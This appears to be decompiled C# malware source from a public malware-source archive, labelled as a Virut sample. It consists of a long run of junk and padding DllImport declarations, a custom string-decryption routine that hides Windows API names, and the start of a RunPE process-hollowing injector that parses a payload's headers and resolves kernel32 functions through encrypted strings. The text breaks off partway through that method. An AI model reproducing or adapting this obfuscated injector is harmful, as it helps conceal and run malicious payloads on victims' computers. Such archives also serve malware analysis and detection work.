mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
1216 lines
42 KiB
C#
1216 lines
42 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: smss.RunpeClass
|
|
// Assembly: smss, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 9DAAF14C-A13E-4FB1-BFB2-3533F8F506E6
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Virut.ac-a8742491b0c24128c984e4272dd39160994413c06121c47fa9bf8ecb333708fd.exe
|
|
|
|
using Microsoft.VisualBasic;
|
|
using System;
|
|
using System.Reflection;
|
|
using System.Runtime.InteropServices;
|
|
using System.Text;
|
|
|
|
namespace smss
|
|
{
|
|
public class RunpeClass
|
|
{
|
|
public const int MAXPNAMELEN = 32;
|
|
public const int MAXPNAMELEN2 = 32;
|
|
public const int MIXER_SHORT_NAME_CHARS = 16;
|
|
public const int MIXER_LONG_NAME_CHARS = 64;
|
|
public const long Asdfasfasf = 2778;
|
|
public const long Fasfasfasf = 60116;
|
|
public const long Afsfasfascfc = 218;
|
|
public const long Asdascasdasd = 218;
|
|
public const long Bvcxbxcbxcb = 218;
|
|
public const long Bxcbxcbxcb = 253;
|
|
public const long Fsdr3Fsf = 218;
|
|
public const long Kkkkkkkkkddddddd = 17247;
|
|
public const uint Fssssssssssssssssss = 218;
|
|
|
|
[DllImport("yrtyor6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName yrtyrhhk6op();
|
|
|
|
[DllImport("yrtyr6pop.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName yrtyro6p();
|
|
|
|
[DllImport("j43yttj6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int j43yty6();
|
|
|
|
[DllImport("j43ytoi6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int j43yt6o();
|
|
|
|
[DllImport("yt3y5rtyrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr yt3y5rt3rty();
|
|
|
|
[DllImport("yt3y5r3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr yy5r3yrty();
|
|
|
|
[DllImport("yt3yrt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr yt3yrt3yrty();
|
|
|
|
[DllImport("yrtyrl6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName yrtyrk6p();
|
|
|
|
[DllImport("yrjtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName yrtyrkk6p();
|
|
|
|
[DllImport("yrt44yr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName yrtyr44K6p();
|
|
|
|
[DllImport("lkwdjsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwkdsdnjfe();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwdsdknjfe();
|
|
|
|
[DllImport("j43ykjmt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int j43ykjmt6();
|
|
|
|
[DllImport("j43yKt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int j43yKt6();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int j43yt6t();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwdrsdnjfe();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwdesdnjfe();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwdwsdnjfe();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName yrtywr6p();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName yrtysr6p();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwdxsdnjfe();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwdss5dnjfe();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwdssdnjfe();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr yt3y5rtrty();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr yt3y5r3yrty();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr yt3y5rt3ty();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwdsdnje();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwdsfe();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwdjfe();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwdsdfe();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment lkwdsdnjfe();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int jr43yt6();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int j43yfgt6();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int j43yt6();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName yrtyer6p();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName yrtyrt6p();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName yrtye6p();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName yrtyr6p();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName yrtytr6p();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr yt3yyy5rt3yrty();
|
|
|
|
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr ytrt3yrty();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a1();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a2();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a3();
|
|
|
|
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName b1();
|
|
|
|
[DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int c1();
|
|
|
|
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr d1();
|
|
|
|
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName b2();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a4();
|
|
|
|
[DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int c2();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a5();
|
|
|
|
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName b3();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a7();
|
|
|
|
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr d2();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a8();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a9();
|
|
|
|
[DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int c4();
|
|
|
|
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName b5();
|
|
|
|
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName b9();
|
|
|
|
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr d3();
|
|
|
|
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr d4();
|
|
|
|
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName b6();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a15();
|
|
|
|
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr d5();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a10();
|
|
|
|
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName b7();
|
|
|
|
[DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int c5();
|
|
|
|
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr d6();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a11();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a12();
|
|
|
|
[DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int c6();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a13();
|
|
|
|
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern AssemblyName b8();
|
|
|
|
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr d7();
|
|
|
|
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr d8();
|
|
|
|
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern Environment a14();
|
|
|
|
[DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int c7();
|
|
|
|
[DllImport("user32", EntryPoint = "OemToCharBuffA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int OemToCharBuff1(
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszSrc,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszDst,
|
|
int cchDstLength);
|
|
|
|
[DllImport("user32", EntryPoint = "OemToCharBuffA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int OemToCharBuff(
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszSrc,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszDst,
|
|
int cchDstLength);
|
|
|
|
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int OffsetRgn(int hRgn, int x, int y);
|
|
|
|
[DllImport("ole32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern void OleUninitialize();
|
|
|
|
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int OffsetViewportOrgEx(
|
|
int hdc,
|
|
int nX,
|
|
int nY,
|
|
RunpeClass.POINTAPI lpPoint);
|
|
|
|
[DllImport("advapi32.dll", EntryPoint = "AccessCheckAndAuditAlarmA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int AccessCheckAndAuditAlarm(
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string SubsystemName,
|
|
byte[] HandleId,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ObjectStructureName,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ObjectName,
|
|
RunpeClass.SECURITY_DESCRIPTOR SecurityDescriptor,
|
|
int DesiredAccess,
|
|
RunpeClass.GENERIC_MAPPING GenericMapping,
|
|
int ObjectCreation,
|
|
int GrantedAccess,
|
|
int AccessStatus,
|
|
int pfGenerateOnClose);
|
|
|
|
[DllImport("pdh.dll", EntryPoint = "PdhVbAddCounter", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int PdhAddCounter(
|
|
int QueryHandle,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string CounterPath,
|
|
ref int CounterHandle);
|
|
|
|
[DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int AbortPrinter(int hPrinter);
|
|
|
|
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int ActivateKeyboardLayout(int HKL, int flags);
|
|
|
|
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int QueryServiceObjectSecurity(
|
|
int hService,
|
|
int dwSecurityInformation,
|
|
byte[] lpSecurityDescriptor,
|
|
int cbBufSize,
|
|
int pcbBytesNeeded);
|
|
|
|
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int Polyline(int hdc, RunpeClass.POINTAPI lpPoint, int nCount);
|
|
|
|
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int AddAccessAllowedAce(
|
|
RunpeClass.ACL pAcl,
|
|
int dwAceRevision,
|
|
int AccessMask,
|
|
byte[] pSid);
|
|
|
|
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int AbortDoc(int hdc);
|
|
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern void RaiseException(
|
|
int dwExceptionCode,
|
|
int dwExceptionFlags,
|
|
int nNumberOfArguments,
|
|
int lpArguments);
|
|
|
|
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int AddAccessDeniedAce(
|
|
RunpeClass.ACL pAcl,
|
|
int dwAceRevision,
|
|
int AccessMask,
|
|
byte[] pSid);
|
|
|
|
[DllImport("kernel32", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int ReadConsole(
|
|
int hConsoleInput,
|
|
byte[] lpBuffer,
|
|
int nNumberOfCharsToRead,
|
|
int lpNumberOfCharsRead,
|
|
byte[] lpReserved);
|
|
|
|
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int AddAuditAccessAce(
|
|
RunpeClass.ACL pAcl,
|
|
int dwAceRevision,
|
|
int dwAccessMask,
|
|
byte[] pSid,
|
|
int bAuditSuccess,
|
|
int bAuditFailure);
|
|
|
|
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int AngleArc(
|
|
int hdc,
|
|
int x,
|
|
int y,
|
|
int dwRadius,
|
|
double eStartAngle,
|
|
double eSweepAngle);
|
|
|
|
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int AllocateLocallyUniqueId(RunpeClass.LARGE_INTEGER Luid);
|
|
|
|
[DllImport("winspool.drv", EntryPoint = "AddJobA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int AddJob(
|
|
int hPrinter,
|
|
int Level,
|
|
byte pData,
|
|
int cdBuf,
|
|
int pcbNeeded);
|
|
|
|
[DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int ReadPrinter(int hPrinter, byte[] pBuf, int cdBuf, int pNoBytesRead);
|
|
|
|
[DllImport("advapi32.dll", EntryPoint = "ReadEventLogA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int ReadEventLog(
|
|
int hEventLog,
|
|
int dwReadFlags,
|
|
int dwRecordOffset,
|
|
RunpeClass.EVENTLOGRECORD lpBuffer,
|
|
int nNumberOfBytesToRead,
|
|
int pnBytesRead,
|
|
int pnMinNumberOfBytesNeeded);
|
|
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int ReadConsoleOutputAttribute(
|
|
int hConsoleOutput,
|
|
int lpAttribute,
|
|
int nLength,
|
|
RunpeClass.COORD dwReadCoord,
|
|
int lpNumberOfAttrsRead);
|
|
|
|
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int AnimatePalette(
|
|
int hPalette,
|
|
int wStartIndex,
|
|
int wNumEntries,
|
|
RunpeClass.PALETTEENTRY lpPaletteColors);
|
|
|
|
[DllImport("gdi32", EntryPoint = "AddFontResourceA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int AddFontResource([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileName);
|
|
|
|
[DllImport("advapi32.dll", EntryPoint = "ChangeServiceConfigA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int ChangeServiceConfig(
|
|
int hService,
|
|
int dwServiceStructure,
|
|
int dwStartStructure,
|
|
int dwErrorControl,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpBinaryPathName,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpLoadOrderGroup,
|
|
int lpdwTagId,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpDependencies,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpServiceStartName,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpPassword,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpDisplayName);
|
|
|
|
[DllImport("kernel32", EntryPoint = "CompareStringA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int CompareString(
|
|
int Locale,
|
|
int dwCmpFlags,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpString1,
|
|
int cchCount1,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpString2,
|
|
int cchCount2);
|
|
|
|
[DllImport("imm32.dll", EntryPoint = "ImmGetIMEFileNameA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int ImmGetIMEFileName(int hkl, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpStr, int uBufLen);
|
|
|
|
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int waveOutPause(int hWaveOut);
|
|
|
|
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int waveOutUnprepareHeader(
|
|
int hWaveOut,
|
|
RunpeClass.WAVEHDR lpWaveOutHdr,
|
|
int uSize);
|
|
|
|
[DllImport("advapi32.dll", EntryPoint = "RegQueryValueA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int RegQueryValue(
|
|
int hKey,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSubKey,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpValue,
|
|
int lpcbValue);
|
|
|
|
[DllImport("user32", EntryPoint = "SendMessageA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int SendMessage(int hwnd, int wMsg, int wParam, byte[] lParam);
|
|
|
|
[DllImport("imm32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int ImmSetCandidateWindow(
|
|
int himc,
|
|
RunpeClass.CANDIDATEFORM lpCandidateForm);
|
|
|
|
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int SetArcDirection(int hdc, int ArcDirection);
|
|
|
|
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int SetClipboardData(int wFormat, int hMem);
|
|
|
|
[DllImport("wininet.dll", EntryPoint = "InternetConnectA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int InternetConnect(
|
|
int hInternetSession,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string sServerName,
|
|
short nServerPort,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string sUsername,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string sPassword,
|
|
int lService,
|
|
int lFlags,
|
|
int lContext);
|
|
|
|
[DllImport("imm32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int ImmSetStatusWindowPos(int himc, RunpeClass.POINTAPI lpPoint);
|
|
|
|
[DllImport("imm32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int ImmSetCompositionWindow(
|
|
int himc,
|
|
RunpeClass.COMPOSITIONFORM lpCompositionForm);
|
|
|
|
[DllImport("user32", EntryPoint = "IsCharAlphaNumericA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int IsCharAlphaNumeric(byte Char2);
|
|
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int LocalReAlloc(int hMem, int wBytes, int wFlags);
|
|
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int LockResource(int hResData);
|
|
|
|
[DllImport("winmm.dll", EntryPoint = "mciGetDeviceIDFromElementIDA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int mciGetDeviceIDFromElementID(int dwElementID, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrStructure);
|
|
|
|
[DllImport("winmm.dll", EntryPoint = "mciSendStringA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int mciSendString(
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrCommand,
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrReturnString,
|
|
int uReturnLength,
|
|
int hwndCallback);
|
|
|
|
[DllImport("winmm", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int mciSetYieldProc(int mciId, int fpYieldProc, int dwYieldData);
|
|
|
|
[DllImport("winmm.dll", EntryPoint = "midiInGetDevCapsA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int midiInGetDevCaps(
|
|
int uDeviceID,
|
|
RunpeClass.MIDIINCAPS lpCaps,
|
|
int uSize);
|
|
|
|
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int midiInAddBuffer(
|
|
int hMidiIn,
|
|
RunpeClass.MIDIHDR lpMidiInHdr,
|
|
int uSize);
|
|
|
|
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int mixerGetID(int hmxobj, int pumxID, int fdwId);
|
|
|
|
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int mixerGetNumDevs();
|
|
|
|
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int mixerMessage(int hmx, int uMsg, int dwParam1, int dwParam2);
|
|
|
|
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int mixerOpen(
|
|
int phmx,
|
|
int uMxId,
|
|
int dwCallback,
|
|
int dwInstance,
|
|
int fdwOpen);
|
|
|
|
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int mmioClose(int hmmio, int uFlags);
|
|
|
|
[DllImport("winmm.dll", EntryPoint = "mixerGetLineControlsA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int mixerGetLineControls(
|
|
int hmxobj,
|
|
RunpeClass.MIXERLINECONTROLS pmxlc,
|
|
int fdwControls);
|
|
|
|
[DllImport("winmm.dll", EntryPoint = "mixerGetDevCapsA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int mixerGetDevCaps(int uMxId, RunpeClass.MIXERCAPS pmxcaps, int cbmxcaps);
|
|
|
|
[DllImport("winmm.dll", EntryPoint = "mixerGetControlDetailsA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern int mixerGetControlDetails(
|
|
int hmxobj,
|
|
RunpeClass.MIXERCONTROLDETAILS pmxcd,
|
|
int fdwDetails);
|
|
|
|
public static string Decrypt(string input, string key)
|
|
{
|
|
if (input == null)
|
|
throw new ArgumentNullException(nameof (input));
|
|
if (key == null)
|
|
throw new ArgumentNullException(nameof (key));
|
|
return Encoding.UTF8.GetString(RunpeClass.Decrypt(Convert.FromBase64String(input), Encoding.UTF8.GetBytes(key)));
|
|
}
|
|
|
|
public static byte[] Decrypt(byte[] input, byte[] key)
|
|
{
|
|
if (input == null)
|
|
throw new ArgumentNullException(nameof (input));
|
|
if (key == null)
|
|
throw new ArgumentNullException(nameof (key));
|
|
int num1 = (int) input[input.Length - 1];
|
|
byte[] numArray = new byte[input.Length - 2 + 1];
|
|
int index1 = 0;
|
|
int num2 = input.Length - 2;
|
|
for (int index2 = 0; index2 <= num2; ++index2)
|
|
{
|
|
if (index1 >= key.Length)
|
|
index1 = 0;
|
|
if (index2 < input.Length - 1)
|
|
{
|
|
numArray[index2] = Convert.ToByte((int) input[index2] - numArray.Length % key.Length - (int) key[index1] + num1);
|
|
++index1;
|
|
}
|
|
}
|
|
return numArray;
|
|
}
|
|
|
|
public static bool Win7() => Environment.OSVersion.Version.Major == 6;
|
|
|
|
public static void RunpeSub(byte[] data, string target)
|
|
{
|
|
RunpeClass.Context context = new RunpeClass.Context();
|
|
RunpeClass.ProcessInformation info = new RunpeClass.ProcessInformation();
|
|
RunpeClass.StartupInformation startup = new RunpeClass.StartupInformation();
|
|
RunpeClass.SecurityFlags process1 = new RunpeClass.SecurityFlags();
|
|
RunpeClass.SecurityFlags thread = new RunpeClass.SecurityFlags();
|
|
GCHandle gcHandle = GCHandle.Alloc((object) data, GCHandleType.Pinned);
|
|
IntPtr ptr = gcHandle.AddrOfPinnedObject();
|
|
int int32 = ptr.ToInt32();
|
|
RunpeClass.DosHeader dosHeader = new RunpeClass.DosHeader();
|
|
RunpeClass.DosHeader structure1 = (RunpeClass.DosHeader) Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), dosHeader.GetType());
|
|
gcHandle.Free();
|
|
RunpeClass.mrqs mrqs = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.mrqs>(RunpeClass.Decrypt("38KgwdqeYXkN ", "yb3Xz73LWVcN"), RunpeClass.Decrypt("hb15tsuxiMe9g3mRy4sl ", "Yb+lncOle7+5oaXBwV0l"));
|
|
if (mrqs == null)
|
|
throw new NotImplementedException();
|
|
RunpeClass.evzew evzew = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.evzew>(RunpeClass.Decrypt("1svIs9KsiWsU ", "wrbQyLbEUlAU"), RunpeClass.Decrypt("ioStf7i8u4O8Yc2/tYXGjic= ", "Z6PBgam9o5uhX7e1waPJwSc="));
|
|
if (evzew == null)
|
|
throw new NotImplementedException();
|
|
RunpeClass.i5Ondq i5Ondq1 = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.i5Ondq>(RunpeClass.Decrypt("3JXhvdjHonUP ", "x7vVzbvJV1UP"), RunpeClass.Decrypt("sbyCyLjBvaPSn9651JvZl+Eb ", "ia+nrYXJw6uvy8t/r7/Dydcb"));
|
|
if (i5Ondq1 == null)
|
|
throw new NotImplementedException();
|
|
RunpeClass.jx95Iq jx95Iq1 = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.jx95Iq>("kernel32", RunpeClass.Decrypt("nrWZvbpmv8a3fIaqm6ilgbS0MQ== ", "fbOht5lvs62VmbW1aZmprbPBMQ=="));
|
|
if (jx95Iq1 == null)
|
|
throw new NotImplementedException();
|
|
